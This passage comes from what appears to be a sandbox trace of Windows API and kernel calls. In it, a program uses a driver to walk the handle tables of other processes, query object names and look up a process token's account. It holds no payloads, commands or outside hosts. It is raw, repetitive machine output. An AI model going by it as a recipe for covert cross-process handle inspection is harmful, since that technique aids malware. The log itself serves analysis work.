Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.958] PsAcquireProcessExitSynchronization () returned 0x0 [0264.959] KeStackAttachProcess (in: PROCESS=0xffffe00069889080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069889080, ApcState=0xffffd000b1b8e400) [0264.959] ObReferenceObjectByHandle (in: Handle=0x450, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00148472250, HandleInformation=0x0) returned 0x0 [0264.959] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.959] PsReleaseProcessExitSynchronization () returned 0x2 [0264.959] ObfDereferenceObject (Object=0xffffe00069889080) returned 0x300e3 [0264.959] ObQueryNameString (in: Object=0xffffc00148472250, ObjectNameInfo=0xffffe0006843c7c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006843c7c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.959] ObfDereferenceObject (Object=0xffffc00148472250) returned 0x18ffef [0264.959] PsLookupProcessByProcessId (in: ProcessId=0x3a4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.959] PsAcquireProcessExitSynchronization () returned 0x0 [0264.959] KeStackAttachProcess (in: PROCESS=0xffffe00069889080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069889080, ApcState=0xffffd000b1b8e400) [0264.959] ObReferenceObjectByHandle (in: Handle=0x48c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069a8fdb0, HandleInformation=0x0) returned 0x0 [0264.959] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.959] PsReleaseProcessExitSynchronization () returned 0x2 [0264.959] ObfDereferenceObject (Object=0xffffe00069889080) returned 0x300e2 [0264.959] ObQueryNameString (in: Object=0xffffe00069a8fdb0, ObjectNameInfo=0xffffe0006a0d0044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a0d0044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.959] ObfDereferenceObject (Object=0xffffe00069a8fdb0) returned 0x7fff [0264.959] PsLookupProcessByProcessId (in: ProcessId=0x3a4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.959] PsAcquireProcessExitSynchronization () returned 0x0 [0264.959] KeStackAttachProcess (in: PROCESS=0xffffe00069889080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069889080, ApcState=0xffffd000b1b8e400) [0264.959] ObReferenceObjectByHandle (in: Handle=0x7f8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a1422a0, HandleInformation=0x0) returned 0x0 [0264.959] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.959] PsReleaseProcessExitSynchronization () returned 0x2 [0264.959] ObfDereferenceObject (Object=0xffffe00069889080) returned 0x300e1 [0264.959] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006840f7c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006840f7c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.959] ObfDereferenceObject (Object=0xffffe0006a1422a0) returned 0x800c [0264.959] PsLookupProcessByProcessId (in: ProcessId=0x3a4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.959] PsAcquireProcessExitSynchronization () returned 0x0 [0264.959] KeStackAttachProcess (in: PROCESS=0xffffe00069889080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069889080, ApcState=0xffffd000b1b8e400) [0264.959] ObReferenceObjectByHandle (in: Handle=0x804, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc0014971aba0, HandleInformation=0x0) returned 0x0 [0264.959] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.959] PsReleaseProcessExitSynchronization () returned 0x2 [0264.959] ObfDereferenceObject (Object=0xffffe00069889080) returned 0x300e0 [0264.959] ObQueryNameString (in: Object=0xffffc0014971aba0, ObjectNameInfo=0xffffe0006a3f2044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3f2044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.959] ObfDereferenceObject (Object=0xffffc0014971aba0) returned 0x7fff [0264.959] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x294) returned 0x180 [0264.959] DeviceIoControl (hDevice=0x164, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0) [0264.959] ObReferenceObjectByHandle (in: Handle=0x180, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e498, HandleInformation=0x0 | out: Object=0xffffd000b1b8e498*=0xffffe000699004c0, HandleInformation=0x0) returned 0x0 [0264.959] ObOpenObjectByPointer (in: Object=0xffffe000699004c0, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000b1b8e4a0 | out: Handle=0xffffd000b1b8e4a0*=0xffffffff80000d8c) returned 0x0 [0264.959] ObfDereferenceObject (Object=0xffffe000699004c0) returned 0x50033 [0264.959] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000d8c, DesiredAccess=0x8, TokenHandle=0xffffe0006a287b00 | out: TokenHandle=0xffffe0006a287b00*=0x1a8) returned 0x0 [0264.959] ZwClose (Handle=0xffffffff80000d8c) returned 0x0 [0264.959] GetTokenInformation (in: TokenHandle=0x1a8, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0264.960] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x14), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="NETWORK SERVICE", cchName=0x14d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0264.960] CloseHandle (hObject=0x1a8) returned 1 [0264.960] CloseHandle (hObject=0x180) returned 1 [0264.960] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.960] PsAcquireProcessExitSynchronization () returned 0x0 [0264.961] KeStackAttachProcess (in: PROCESS=0xffffe000699004c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000699004c0, ApcState=0xffffd000b1b8e400) [0264.961] ObReferenceObjectByHandle (in: Handle=0x18, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000698f3750, HandleInformation=0x0) returned 0x0 [0264.961] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.961] PsReleaseProcessExitSynchronization () returned 0x2 [0264.961] ObfDereferenceObject (Object=0xffffe000699004c0) returned 0x48031 [0264.961] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe00069197044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe00069197044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.961] ObfDereferenceObject (Object=0xffffe000698f3750) returned 0x7fff [0264.961] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.961] PsAcquireProcessExitSynchronization () returned 0x0 [0264.961] KeStackAttachProcess (in: PROCESS=0xffffe000699004c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000699004c0, ApcState=0xffffd000b1b8e400) [0264.961] ObReferenceObjectByHandle (in: Handle=0xa8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069903cf0, HandleInformation=0x0) returned 0x0 [0264.961] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.961] PsReleaseProcessExitSynchronization () returned 0x2 [0264.961] ObfDereferenceObject (Object=0xffffe000699004c0) returned 0x48030 [0264.961] ObQueryNameString (in: Object=0xffffe00067e4f240, ObjectNameInfo=0xffffe0006a3a0044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a3a0044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.961] ObfDereferenceObject (Object=0xffffe00069903cf0) returned 0x7ffc [0264.961] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.961] PsAcquireProcessExitSynchronization () returned 0x0 [0264.961] KeStackAttachProcess (in: PROCESS=0xffffe000699004c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000699004c0, ApcState=0xffffd000b1b8e400) [0264.961] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069905950, HandleInformation=0x0) returned 0x0 [0264.961] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.961] PsReleaseProcessExitSynchronization () returned 0x2 [0264.961] ObfDereferenceObject (Object=0xffffe000699004c0) returned 0x4802f [0264.961] ObQueryNameString (in: Object=0xffffe00069905950, ObjectNameInfo=0xffffe0006a4397c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a4397c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.961] ObfDereferenceObject (Object=0xffffe00069905950) returned 0x7fff [0264.961] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.961] PsAcquireProcessExitSynchronization () returned 0x0 [0264.961] KeStackAttachProcess (in: PROCESS=0xffffe000699004c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000699004c0, ApcState=0xffffd000b1b8e400) [0264.961] ObReferenceObjectByHandle (in: Handle=0xe8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a909a90, HandleInformation=0x0) returned 0x0 [0264.961] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.961] PsReleaseProcessExitSynchronization () returned 0x2 [0264.961] ObfDereferenceObject (Object=0xffffe000699004c0) returned 0x4802e [0264.961] ObQueryNameString (in: Object=0xffffe00072a93060, ObjectNameInfo=0xffffe0006914d044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006914d044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.961] ObfDereferenceObject (Object=0xffffe0006a909a90) returned 0x7ff1 [0264.961] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.961] PsAcquireProcessExitSynchronization () returned 0x0 [0264.961] KeStackAttachProcess (in: PROCESS=0xffffe000699004c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000699004c0, ApcState=0xffffd000b1b8e400) [0264.961] ObReferenceObjectByHandle (in: Handle=0x148, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00068107550, HandleInformation=0x0) returned 0x0 [0264.961] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.961] PsReleaseProcessExitSynchronization () returned 0x2 [0264.961] ObfDereferenceObject (Object=0xffffe000699004c0) returned 0x4802d [0264.961] ObQueryNameString (in: Object=0xffffe00068b6a060, ObjectNameInfo=0xffffe0006a40c7c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a40c7c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.961] ObfDereferenceObject (Object=0xffffe00068107550) returned 0x7ffe [0264.961] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.961] PsAcquireProcessExitSynchronization () returned 0x0 [0264.961] KeStackAttachProcess (in: PROCESS=0xffffe000699004c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000699004c0, ApcState=0xffffd000b1b8e400) [0264.962] ObReferenceObjectByHandle (in: Handle=0x194, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00068109520, HandleInformation=0x0) returned 0x0 [0264.962] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.962] PsReleaseProcessExitSynchronization () returned 0x2 [0264.962] ObfDereferenceObject (Object=0xffffe000699004c0) returned 0x4802c [0264.962] ObQueryNameString (in: Object=0xffffe00068109520, ObjectNameInfo=0xffffe000690ef044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe000690ef044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.962] ObfDereferenceObject (Object=0xffffe00068109520) returned 0x64eb [0264.962] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.962] PsAcquireProcessExitSynchronization () returned 0x0 [0264.962] KeStackAttachProcess (in: PROCESS=0xffffe000699004c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000699004c0, ApcState=0xffffd000b1b8e400) [0264.962] ObReferenceObjectByHandle (in: Handle=0x19c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00068108920, HandleInformation=0x0) returned 0x0 [0264.962] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.962] PsReleaseProcessExitSynchronization () returned 0x2 [0264.962] ObfDereferenceObject (Object=0xffffe000699004c0) returned 0x4802b [0264.962] ObQueryNameString (in: Object=0xffffe00068108920, ObjectNameInfo=0xffffe00068a64044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00068a64044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.962] ObfDereferenceObject (Object=0xffffe00068108920) returned 0x7fee [0264.962] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.962] PsAcquireProcessExitSynchronization () returned 0x0 [0264.962] KeStackAttachProcess (in: PROCESS=0xffffe000699004c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000699004c0, ApcState=0xffffd000b1b8e400) [0264.962] ObReferenceObjectByHandle (in: Handle=0x290, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a115f20, HandleInformation=0x0) returned 0x0 [0264.962] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.962] PsReleaseProcessExitSynchronization () returned 0x2 [0264.962] ObfDereferenceObject (Object=0xffffe000699004c0) returned 0x4802a [0264.962] ObQueryNameString (in: Object=0xffffe0006a115f20, ObjectNameInfo=0xffffe0006a40f044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a40f044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.962] ObfDereferenceObject (Object=0xffffe0006a115f20) returned 0x7ffd [0264.962] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.962] PsAcquireProcessExitSynchronization () returned 0x0 [0264.962] KeStackAttachProcess (in: PROCESS=0xffffe000699004c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000699004c0, ApcState=0xffffd000b1b8e400) [0264.962] ObReferenceObjectByHandle (in: Handle=0x2dc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069993090, HandleInformation=0x0) returned 0x0 [0264.962] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.962] PsReleaseProcessExitSynchronization () returned 0x2 [0264.962] ObfDereferenceObject (Object=0xffffe000699004c0) returned 0x48029 [0264.962] ObQueryNameString (in: Object=0xffffe00069993090, ObjectNameInfo=0xffffe00069041044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00069041044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.962] ObfDereferenceObject (Object=0xffffe00069993090) returned 0x7fbd [0264.962] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.962] PsAcquireProcessExitSynchronization () returned 0x0 [0264.962] KeStackAttachProcess (in: PROCESS=0xffffe000699004c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000699004c0, ApcState=0xffffd000b1b8e400) [0264.962] ObReferenceObjectByHandle (in: Handle=0x2ec, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069873230, HandleInformation=0x0) returned 0x0 [0264.962] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.962] PsReleaseProcessExitSynchronization () returned 0x2 [0264.962] ObfDereferenceObject (Object=0xffffe000699004c0) returned 0x48028 [0264.962] ObQueryNameString (in: Object=0xffffe0006901cc00, ObjectNameInfo=0xffffe0006a4147c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a4147c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.962] ObfDereferenceObject (Object=0xffffe00069873230) returned 0x8000 [0264.962] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.962] PsAcquireProcessExitSynchronization () returned 0x0 [0264.962] KeStackAttachProcess (in: PROCESS=0xffffe000699004c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000699004c0, ApcState=0xffffd000b1b8e400) [0264.962] ObReferenceObjectByHandle (in: Handle=0x30c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069873620, HandleInformation=0x0) returned 0x0 [0264.963] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.963] PsReleaseProcessExitSynchronization () returned 0x2 [0264.963] ObfDereferenceObject (Object=0xffffe000699004c0) returned 0x48027 [0264.963] ObQueryNameString (in: Object=0xffffe0006901cc00, ObjectNameInfo=0xffffe0006a44d7c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a44d7c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.963] ObfDereferenceObject (Object=0xffffe00069873620) returned 0x7ffe [0264.963] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.963] PsAcquireProcessExitSynchronization () returned 0x0 [0264.963] KeStackAttachProcess (in: PROCESS=0xffffe000699004c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000699004c0, ApcState=0xffffd000b1b8e400) [0264.963] ObReferenceObjectByHandle (in: Handle=0x310, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000699a83a0, HandleInformation=0x0) returned 0x0 [0264.963] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.963] PsReleaseProcessExitSynchronization () returned 0x2 [0264.963] ObfDereferenceObject (Object=0xffffe000699004c0) returned 0x48026 [0264.963] ObQueryNameString (in: Object=0xffffe00069983580, ObjectNameInfo=0xffffe0006a334044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a334044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.963] ObfDereferenceObject (Object=0xffffe000699a83a0) returned 0x7ff2 [0264.963] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.963] PsAcquireProcessExitSynchronization () returned 0x0 [0264.963] KeStackAttachProcess (in: PROCESS=0xffffe000699004c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000699004c0, ApcState=0xffffd000b1b8e400) [0264.963] ObReferenceObjectByHandle (in: Handle=0x31c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000699b68d0, HandleInformation=0x0) returned 0x0 [0264.963] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.963] PsReleaseProcessExitSynchronization () returned 0x2 [0264.963] ObfDereferenceObject (Object=0xffffe000699004c0) returned 0x48025 [0264.963] ObQueryNameString (in: Object=0xffffe000756919d0, ObjectNameInfo=0xffffe0006a3ae6c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a3ae6c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.963] ObfDereferenceObject (Object=0xffffe000699b68d0) returned 0x8000 [0264.963] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.963] PsAcquireProcessExitSynchronization () returned 0x0 [0264.963] KeStackAttachProcess (in: PROCESS=0xffffe000699004c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000699004c0, ApcState=0xffffd000b1b8e400) [0264.963] ObReferenceObjectByHandle (in: Handle=0x334, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000699b5520, HandleInformation=0x0) returned 0x0 [0264.963] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.963] PsReleaseProcessExitSynchronization () returned 0x2 [0264.963] ObfDereferenceObject (Object=0xffffe000699004c0) returned 0x48024 [0264.963] ObQueryNameString (in: Object=0xffffe000699b5520, ObjectNameInfo=0xffffe0006a3307c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3307c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.963] ObfDereferenceObject (Object=0xffffe000699b5520) returned 0x7f54 [0264.963] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.963] PsAcquireProcessExitSynchronization () returned 0x0 [0264.963] KeStackAttachProcess (in: PROCESS=0xffffe000699004c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000699004c0, ApcState=0xffffd000b1b8e400) [0264.963] ObReferenceObjectByHandle (in: Handle=0x3c0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00148472250, HandleInformation=0x0) returned 0x0 [0264.963] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.963] PsReleaseProcessExitSynchronization () returned 0x2 [0264.963] ObfDereferenceObject (Object=0xffffe000699004c0) returned 0x48023 [0264.963] ObQueryNameString (in: Object=0xffffc00148472250, ObjectNameInfo=0xffffe0006a331244, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a331244, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.963] ObfDereferenceObject (Object=0xffffc00148472250) returned 0x18ffee [0264.963] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.963] PsAcquireProcessExitSynchronization () returned 0x0 [0264.963] KeStackAttachProcess (in: PROCESS=0xffffe000699004c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000699004c0, ApcState=0xffffd000b1b8e400) [0264.963] ObReferenceObjectByHandle (in: Handle=0x3d0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00148472250, HandleInformation=0x0) returned 0x0 [0264.963] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.963] PsReleaseProcessExitSynchronization () returned 0x2 [0264.964] ObfDereferenceObject (Object=0xffffe000699004c0) returned 0x48022 [0264.964] ObQueryNameString (in: Object=0xffffc00148472250, ObjectNameInfo=0xffffe0006a33d044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a33d044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.964] ObfDereferenceObject (Object=0xffffc00148472250) returned 0x18ffed [0264.964] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.964] PsAcquireProcessExitSynchronization () returned 0x0 [0264.964] KeStackAttachProcess (in: PROCESS=0xffffe000699004c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000699004c0, ApcState=0xffffd000b1b8e400) [0264.964] ObReferenceObjectByHandle (in: Handle=0x424, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069a81f20, HandleInformation=0x0) returned 0x0 [0264.964] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.964] PsReleaseProcessExitSynchronization () returned 0x2 [0264.964] ObfDereferenceObject (Object=0xffffe000699004c0) returned 0x48021 [0264.964] ObQueryNameString (in: Object=0xffffe00069a81f20, ObjectNameInfo=0xffffe0006a3f8044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3f8044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.964] ObfDereferenceObject (Object=0xffffe00069a81f20) returned 0x800f [0264.964] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.964] PsAcquireProcessExitSynchronization () returned 0x0 [0264.964] KeStackAttachProcess (in: PROCESS=0xffffe000699004c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000699004c0, ApcState=0xffffd000b1b8e400) [0264.964] ObReferenceObjectByHandle (in: Handle=0x480, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069a9dd00, HandleInformation=0x0) returned 0x0 [0264.964] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.964] PsReleaseProcessExitSynchronization () returned 0x2 [0264.964] ObfDereferenceObject (Object=0xffffe000699004c0) returned 0x48020 [0264.964] ObQueryNameString (in: Object=0xffffe00069a9dd00, ObjectNameInfo=0xffffe00068178044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00068178044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.964] ObfDereferenceObject (Object=0xffffe00069a9dd00) returned 0x7f78 [0264.964] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.964] PsAcquireProcessExitSynchronization () returned 0x0 [0264.964] KeStackAttachProcess (in: PROCESS=0xffffe000699004c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000699004c0, ApcState=0xffffd000b1b8e400) [0264.964] ObReferenceObjectByHandle (in: Handle=0x5dc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069b0aa50, HandleInformation=0x0) returned 0x0 [0264.964] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.964] PsReleaseProcessExitSynchronization () returned 0x2 [0264.964] ObfDereferenceObject 